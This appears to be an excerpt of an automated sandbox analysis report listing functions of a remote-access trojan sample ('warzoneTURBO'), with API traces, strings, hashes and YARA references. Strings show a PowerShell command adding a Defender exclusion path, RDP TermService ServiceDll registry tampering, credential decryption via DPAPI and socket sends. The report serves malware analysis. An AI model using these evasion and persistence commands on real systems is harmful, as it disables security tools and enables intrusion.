                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,0040DB4A), ref: 00410BC9
                                                                            • FindResourceW.KERNEL32(00000000,00000001,00000010,?,00000000,00000002,?,?,?,0040DB4A), ref: 00410BDD
                                                                            • LoadResource.KERNEL32(00000000,00000000,?,00000000,00000002,?,?,?,0040DB4A), ref: 00410BE9
                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000002,?,?,?,0040DB4A), ref: 00410C2E
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoadResource$FindFree
                                                                            • String ID:
                                                                            • API String ID: 3272429154-0
                                                                            • Opcode ID: 370e803f3f576e3dc6d64e982104e9389b7bb4e1ba6f79afae3c6c1c6fe46297
                                                                            • Instruction ID: f4e202401f230fa34ee939e17adc442f0fb496cb623fe9efe51c7003b0681515
                                                                            • Opcode Fuzzy Hash: 370e803f3f576e3dc6d64e982104e9389b7bb4e1ba6f79afae3c6c1c6fe46297
                                                                            • Instruction Fuzzy Hash: A601C0B5315A05AFD3184F299C84AA6B6A4FF49310704C239E825C73A0D7B8D891CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040C157 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3D8
                                                                              • Part of subcall function 0040C3B9: LocalAlloc.KERNEL32(00000040,?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C3E6
                                                                              • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3FC
                                                                              • Part of subcall function 0040C3B9: LocalFree.KERNEL32(?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C40A
                                                                            • LocalFree.KERNEL32(?,00000000,-0000003A,00000000,?), ref: 0040C1D1
                                                                              • Part of subcall function 0040C1DD: GetLastError.KERNEL32 ref: 0040C243
                                                                            • LocalFree.KERNEL32(?), ref: 0040C1CA
                                                                              • Part of subcall function 0040C419: BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,0040C1C4,?), ref: 0040C436
                                                                              • Part of subcall function 0040C419: BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,0040C1C4,?), ref: 0040C44F
                                                                              • Part of subcall function 0040C419: BCryptGenerateSymmetricKey.BCRYPT(00000020,0040C1C4,00000000,00000000,?,00000020,00000000,?,0040C1C4,?), ref: 0040C464
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Crypt$Local$Free$BinaryString$AlgorithmAllocErrorGenerateLastOpenPropertyProviderSymmetric
                                                                            • String ID: $DPAPI
                                                                            • API String ID: 379455710-1819349886
                                                                            • Opcode ID: 723dafc30d50a614663938c1a140f779ca85de166bebee2fe5dd54bad53c82e3
                                                                            • Instruction ID: a3944bf262eb46a5dfa84945d41dbb41adefefd1d9f51366da1d16fc86cbb9f5
                                                                            • Opcode Fuzzy Hash: 723dafc30d50a614663938c1a140f779ca85de166bebee2fe5dd54bad53c82e3
                                                                            • Instruction Fuzzy Hash: ED016176900109EBCF10EBA1DC859EEB779AB44358F018276FD00B61C5E774AA45CB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004048B7 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastInputInfo.USER32 ref: 004048CC
                                                                            • GetTickCount.KERNEL32 ref: 004048D2
                                                                            • GetForegroundWindow.USER32 ref: 004048E6
                                                                            • GetWindowTextW.USER32 ref: 004048F9
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Windowlstrlen$CountDispatcherExceptionForegroundFreeInfoInputLastTextTickUserVirtual
                                                                            • String ID:
                                                                            • API String ID: 3825627427-0
                                                                            • Opcode ID: 46720f723d15755cbf12386a5d990a83d361cd051bbd11b0eb8a51d3c765656a
                                                                            • Instruction ID: 7d24786f3acb5e761febb0f7532cdf611125a99f062c3633d978c4158144353a
                                                                            • Opcode Fuzzy Hash: 46720f723d15755cbf12386a5d990a83d361cd051bbd11b0eb8a51d3c765656a
                                                                            • Instruction Fuzzy Hash: D2110C72D00109ABCB04EFA1DD59ADDBBBDEF58305F0081A9B406B7191EF78AB44CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040FFA8 Relevance: 6.0, APIs: 4, Instructions: 35threadsynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0040FFB4
                                                                            • SetEvent.KERNEL32(00000000), ref: 0040FFC8
                                                                            • WaitForSingleObject.KERNEL32(0042661C,00001388), ref: 0040FFD5
                                                                            • TerminateThread.KERNEL32(0042661C,000000FE), ref: 0040FFE6
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Thread$CurrentEventObjectSingleTerminateWait
                                                                            • String ID:
                                                                            • API String ID: 2174867186-0
                                                                            • Opcode ID: 9d65ee8b535991cc2c83cc34afe86964b00005fc8ac1bd73bdc2cdf835250f44
                                                                            • Instruction ID: feb65e06b3125344950c2ecfb6ecdf7295e9879baf5c0db247f31f74b0556ec4
                                                                            • Opcode Fuzzy Hash: 9d65ee8b535991cc2c83cc34afe86964b00005fc8ac1bd73bdc2cdf835250f44
                                                                            • Instruction Fuzzy Hash: 04011231004641EBE734AF11EC89AEA7BB2BF54315F504A3EF097515E2CBB969C9CA44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004111D7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                            • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0041121B
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,77C30770,00000000,77C30770,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                                                              • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,77C30770,00000000,77C30770,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                                                              • Part of subcall function 00412554: RegCloseKey.KERNELBASE(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: QueryValuelstrlen$CloseDispatcherExceptionFreeOpenUserVirtual
                                                                            • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                            • API String ID: 1654648907-1211650757
                                                                            • Opcode ID: 0c82c9a53f3f990eb4086e73eb5f784c8d770a9f7970ecd65c7419a389387ce6
                                                                            • Instruction ID: abda254be5c657bc903fa0ced37de60f06049733804472e9a7e1bd392f4ec8b1
                                                                            • Opcode Fuzzy Hash: 0c82c9a53f3f990eb4086e73eb5f784c8d770a9f7970ecd65c7419a389387ce6
                                                                            • Instruction Fuzzy Hash: 40115C30A0011AAACB04EF95C9628EEBB79AF54745B50016FF401B31D1DBB85F49DBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040DCBF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,0055AD18,?,?,0040E2F1,?,?), ref: 0040DCF1
                                                                              • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,77C30770,00000000,77C30770,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                                                              • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,77C30770,00000000,77C30770,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 00412554: RegCloseKey.KERNELBASE(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                                                            Strings
                                                                            • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040DCCC
                                                                            • ServiceDll, xrefs: 0040DCFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: QueryValuelstrlen$CloseDispatcherExceptionFreeOpenUserVirtual
                                                                            • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                                                            • API String ID: 1654648907-387424650
                                                                            • Opcode ID: 7ab0eea5afd062f5f65387bf4bcc203051eea5cec69280cb6f9a26493aa2497a
                                                                            • Instruction ID: 01bca762208379d142ed9eb01ac329b8ace23437b38cc5e4ab4ac662769df0df
                                                                            • Opcode Fuzzy Hash: 7ab0eea5afd062f5f65387bf4bcc203051eea5cec69280cb6f9a26493aa2497a
                                                                            • Instruction Fuzzy Hash: EB114C71D00209BACB14EFA2C9928EEBB78EE50705F10016AE801B72C1DB785F05CB94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040D856 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0040D88A
                                                                              • Part of subcall function 004125DF: RegSetValueExW.ADVAPI32(?,000F003F,00000000,80000001,?,?,?,?,004127D2,?,?,00000003,80000001,?,000F003F,00000000), ref: 004125FE
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 00412554: RegCloseKey.KERNELBASE(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                                                            Strings
                                                                            • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040D862
                                                                            • ServiceDll, xrefs: 0040D8A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$CloseDispatcherExceptionFreeOpenUserValueVirtual
                                                                            • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                                                            • API String ID: 1557097135-387424650
                                                                            • Opcode ID: ba8d4023aa76601c343723c15223fb17b564002561b68f10df811a01d0a3b275
                                                                            • Instruction ID: f4c174c2a9310d4c42edb30c9c3d52768df1180ce11ea76c469564d993fc98ad
                                                                            • Opcode Fuzzy Hash: ba8d4023aa76601c343723c15223fb17b564002561b68f10df811a01d0a3b275
                                                                            • Instruction Fuzzy Hash: C2111C75D00219ABCB14EF92CC96DEFBB79EF94704F40406EE812B22D1DB785A45CA68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00412569 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(?,77C30770,00000000,77C30770,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                                                              • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                              • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                            • RegQueryValueExW.ADVAPI32(?,77C30770,00000000,77C30770,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                                                              • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                                                              • Part of subcall function 00401099: RtlFreeHeap.NTDLL(00000000), ref: 004010A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$ProcessQueryValue$AllocateFree
                                                                            • String ID: ?VA
                                                                            • API String ID: 3459632794-1028452459
                                                                            • Opcode ID: 0b292bdef0829f50d569de129b07e1f12dd45be3c1f1d3bd40aaa1ef304ff4b6
                                                                            • Instruction ID: ef5b91e0520f3c1ad74f83bd351b8b7f17400620d7ac54be9350e6622f7c98ba
                                                                            • Opcode Fuzzy Hash: 0b292bdef0829f50d569de129b07e1f12dd45be3c1f1d3bd40aaa1ef304ff4b6
                                                                            • Instruction Fuzzy Hash: E7019E72900118BFEB15DFA1DD85DEF7BBDEF08354B10007AF901E2250EA749F959AA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00414F7E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                              • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000100,?,?,?,?,?,?,?,00000000,77C30770,00000000,004156DE), ref: 00414FAF
                                                                            • WinExec.KERNEL32 ref: 00414FF5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocateExecFileModuleNameProcess
                                                                            • String ID: powershell Add-MpPreference -ExclusionPath
                                                                            • API String ID: 1183730998-2194938034
                                                                            • Opcode ID: 0fce4c3b90f01b99dc6074e159970c8f1f4ae8f7f4535012ad248e759a026d52
                                                                            • Instruction ID: f9242cdbd1c9b696a892a29a9369df0dc44288307f8c57903ac4db52bc2fe90b
                                                                            • Opcode Fuzzy Hash: 0fce4c3b90f01b99dc6074e159970c8f1f4ae8f7f4535012ad248e759a026d52
                                                                            • Instruction Fuzzy Hash: E7F062B154025476F22032725CCBFBF566CDF89758F04043BF684B55D2EA7C994141BD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004056F5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • send.WS2_32(00415E66,bP@,?,00000000), ref: 00405758
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: send
                                                                            • String ID: bP@$warzoneTURBO
                                                                            • API String ID: 2809346765-1210837753
                                                                            • Opcode ID: ba43dab9fb23a9a5b87c700c3ac53c84a905255abf27ae10a71e43910599125e
                                                                            • Instruction ID: f3416621e5f2c5c02f3395680495e6a6f54d57ba278d3546227d2c899631d6b7
                                                                            • Opcode Fuzzy Hash: ba43dab9fb23a9a5b87c700c3ac53c84a905255abf27ae10a71e43910599125e
                                                                            • Instruction Fuzzy Hash: 4A01C431900009BBCB04BFA6DC42CEEBB68DF14325B10423EF122761D1DB396B058A68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041068D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                              • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                            • recv.WS2_32(?,00000000,00001F40,00000000), ref: 004106BA
                                                                            • closesocket.WS2_32(?), ref: 004106E7
                                                                              • Part of subcall function 004106F9: send.WS2_32(?,00000000,00000002,00000000), ref: 0041074A
                                                                              • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                                                              • Part of subcall function 00401099: RtlFreeHeap.NTDLL(00000000), ref: 004010A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$Process$AllocateFreeclosesocketrecvsend
                                                                            • String ID: <5Ik
                                                                            • API String ID: 1908950363-1120072674
                                                                            • Opcode ID: 21b88c655a3f90420948bd08a6e993c7b1e70d5893b0c84512869bef3746b2a7
                                                                            • Instruction ID: cf5c065e532922d4a3d76e571e2bf2fb24ffb7083d1690fd6d685bf59492f6b1
                                                                            • Opcode Fuzzy Hash: 21b88c655a3f90420948bd08a6e993c7b1e70d5893b0c84512869bef3746b2a7
                                                                            • Instruction Fuzzy Hash: 85F09C716042442EE22063256C4AFFF379CCFC57ACF14016BFA04561E1DAF85CD282AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004056D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: closesocketshutdown
                                                                            • String ID: <5Ik
                                                                            • API String ID: 572888783-1120072674
                                                                            • Opcode ID: 18556ba7e844cce46ebd37ac9a9e97582c4fa6a7267480bb493a8cf1ab882a1f
                                                                            • Instruction ID: 284792fdbf7bd6b26f007be0ad5fa8b9be9590e38c7f66b8807de1f76de5a812
                                                                            • Opcode Fuzzy Hash: 18556ba7e844cce46ebd37ac9a9e97582c4fa6a7267480bb493a8cf1ab882a1f
                                                                            • Instruction Fuzzy Hash: 6FD0C931018B109FD7311B14ED0EF92BBB1AB00332F10C65DE8BA444F0C7A06850DF84
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040ECE1 Relevance: 5.1, APIs: 4, Instructions: 77memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040EE24: SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 0040EE72
                                                                              • Part of subcall function 0040EE24: WriteFile.KERNEL32(?,`@,00426970,00000150,00000000,?,00000000,00000000), ref: 0040EE92
                                                                            • LocalAlloc.KERNEL32(00000040,00000018,00000001,?,0040EAD8), ref: 0040ED3D
                                                                              • Part of subcall function 0040EE24: WriteProcessMemory.KERNEL32(?,?,`@,00426970,00000000,?,00000000,00000000), ref: 0040EEB3
                                                                              • Part of subcall function 0040EE24: LocalAlloc.KERNEL32(00000040,00426970,?,00000000,00000000), ref: 0040EEC0
                                                                              • Part of subcall function 0040EE24: LocalFree.KERNEL32(?), ref: 0040EEF6
                                                                            • LocalAlloc.KERNEL32(00000040,00000108), ref: 0040ED6C
                                                                            • LocalFree.KERNEL32(00000000), ref: 0040EDA0
                                                                              • Part of subcall function 0040EE24: SetFilePointer.KERNEL32(?,`@,00000000,00000000,?,00000000,00000000), ref: 0040EF1A
                                                                              • Part of subcall function 0040EE24: ReadFile.KERNEL32(?,?,00426970,00000150,00000000), ref: 0040EF37
                                                                              • Part of subcall function 0040EE24: ReadProcessMemory.KERNEL32(?,`@,?,00426970,00000000,?,00000000,00000000), ref: 0040EF4F
                                                                            • LocalFree.KERNEL32(?), ref: 0040ED9B
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$File$AllocFree$MemoryPointerProcessReadWrite
                                                                            • String ID:
                                                                            • API String ID: 2785045919-0
                                                                            • Opcode ID: 22fa37b712431e4a8c17cca72e3668fb64202397e257683892f01d797e81ccf6
                                                                            • Instruction ID: 844012893b931533083f36e29c55c77bc0a60c617dbdfc6ad0899e7f9f39f4eb
                                                                            • Opcode Fuzzy Hash: 22fa37b712431e4a8c17cca72e3668fb64202397e257683892f01d797e81ccf6
                                                                            • Instruction Fuzzy Hash: 32213B71E0020E9BCB10DFAAC9419DEF7B5EF84700F15846BE500BB290EB78AE01CB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Executed Functions

                                                                            Function 00D75298 Relevance: 1.7, Strings: 1, Instructions: 443COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR`q
                                                                            • API String ID: 0-3712084042
                                                                            • Opcode ID: 6c1bcd682a1aa141c76288006da9bc1b254435c1403fc45f26dd7dfc58a37a9f
                                                                            • Instruction ID: 0d4a6a22f2a3d959ead428c1417daf9d8dfb63fb5fe4202671410dcc75ee1e95
                                                                            • Opcode Fuzzy Hash: 6c1bcd682a1aa141c76288006da9bc1b254435c1403fc45f26dd7dfc58a37a9f
                                                                            • Instruction Fuzzy Hash: 76125934E10619CFDB14DF69E984AADB7F2BF88300F15C56AE009EB258DB74A941CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D759F4 Relevance: 1.6, Strings: 1, Instructions: 382COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR`q
                                                                            • API String ID: 0-3712084042
                                                                            • Opcode ID: 0357ba557b819faf93671c1f2ce5840718a2941d5a81a77f80f9205deb1da14b
                                                                            • Instruction ID: e6b6d385bb9381488e7ec8c1e9af1ed1a8ae3db0898d5e27d466da636e665521
                                                                            • Opcode Fuzzy Hash: 0357ba557b819faf93671c1f2ce5840718a2941d5a81a77f80f9205deb1da14b
                                                                            • Instruction Fuzzy Hash: 11F1B331E006298FCB14DF69D880AADFBF2BF85300F19C5A9E059DB259D774AD81CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D75289 Relevance: 1.5, Strings: 1, Instructions: 242COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR`q
                                                                            • API String ID: 0-3712084042
                                                                            • Opcode ID: 7b943549dab1e2923ab2ecbf7d17a3eb3c4a0234ea303f5016a8e2c02e86476c
                                                                            • Instruction ID: d262837a87c3a7fa054966cedf78784b75610000c46eb43ec7b3a09369dd3adc
                                                                            • Opcode Fuzzy Hash: 7b943549dab1e2923ab2ecbf7d17a3eb3c4a0234ea303f5016a8e2c02e86476c
                                                                            • Instruction Fuzzy Hash: B1917C35E106198FDB14DFB9E884AAEB7F2BFC8304F55C529E405AB358DB346902CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D752D2 Relevance: 1.5, Strings: 1, Instructions: 230COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR`q
                                                                            • API String ID: 0-3712084042
                                                                            • Opcode ID: 959a259b7e374b301e9ee2530a8332a3cd9ca56c2cef520bba6238791232f1e8
                                                                            • Instruction ID: 8885806bfdf3b4720436f2acdbcffb67b4a635e4bb9ef084ffb1037727ca2471
                                                                            • Opcode Fuzzy Hash: 959a259b7e374b301e9ee2530a8332a3cd9ca56c2cef520bba6238791232f1e8
